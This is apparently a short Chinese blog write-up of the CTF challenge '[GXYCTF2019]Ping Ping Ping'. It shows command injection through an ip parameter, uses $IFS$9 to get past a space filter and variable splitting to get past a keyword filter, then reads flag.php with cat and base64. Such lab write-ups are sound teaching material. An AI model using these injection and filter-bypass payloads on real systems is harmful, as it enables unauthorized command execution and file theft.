访问题目后存在提示。
随后输入:/?ip=1;ls
即可看到当前目录下存在 flag.php
文件。
这里尝试使用 Payload
:/?ip=1;cat flag.php
得到如下。
这里尝试使用:${IFS}
、{IFS}$9
、$IFS$9
来绕过空格过滤,发现程序也检测了 {
、}
符号,因此使用 $IFS$9
来代替空格,题目反馈如下。
因此使用变量来表示 flag
,即:/?ip=1;b=ag.php;a=fl;cat$IFS$9$a$b
,发现没有被拦截,但没有输出 flag
,尝试使用 base64
命令替换 cat
,/?ip=1;b=ag.php;a=fl;base64$IFS$9$a$b
,最终得到 flag
。
[GXYCTF2019]Ping Ping Ping
发布时间 2023-10-31 17:40:03作者: imtaieee